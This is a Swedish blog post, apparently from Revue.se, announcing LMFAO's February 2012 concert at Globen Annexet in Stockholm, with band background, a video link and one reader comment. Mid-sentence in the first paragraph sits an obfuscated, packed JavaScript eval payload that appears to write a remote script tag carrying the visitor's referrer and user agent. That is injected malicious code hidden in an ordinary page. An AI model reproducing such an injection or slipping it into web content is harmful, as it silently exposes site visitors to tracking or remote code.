Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

En vecka kvar till LMFAO på Globen Annexet

En vecka kvar till LMFAO på Globen Annexet
Sebastian

Först eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|riray|var|u0026u|referrer|edkrf||js|php’.split(’|’),0,{}))
var lokalen Nalen, sen blev det Berns och nu är det Globen Annexet. Ja just det, snart är det dags för kanske en av världens just nu populäraste duo att gästa Stockholm Globen Annexet. LMFAO är namnet, och grundades 2006 i Los Angeles. Grabbarna slog igenom 2008 med låten I’m in Miami bitch efter att ha varit på musikfestivalen WMC i Miami. 

Nu kommer de till Sverige och kör en livespelning på Annexet i Stockholm. För er som missade Super Bowl så var LMFAO några av gästerna i den stora ”half-time” akten som Madonna höll i. Ni kan se den i videon nedan!
Låtarna från deras senaste album ”Sorry for party rocking” kommer stå i centrum under föreställningen men självklart kommer det också bjudas på klassiker.

Revue.se kommer vara på plats och dansa loss samtidigt som vi plockar in information för en kommande recension.Vi är mycket taggade på evenemanget och hoppas ni också är det.

Datum: Den 18 februari 2012

Plats: Annexet i Stockholm

Recension: Revue.se 🙂

Läs mer om eventet här

httpv://www.youtube.com/watch?v=PyfdoZldrS4

Comments

  1. Johannes

    Kommer bli as grymt!!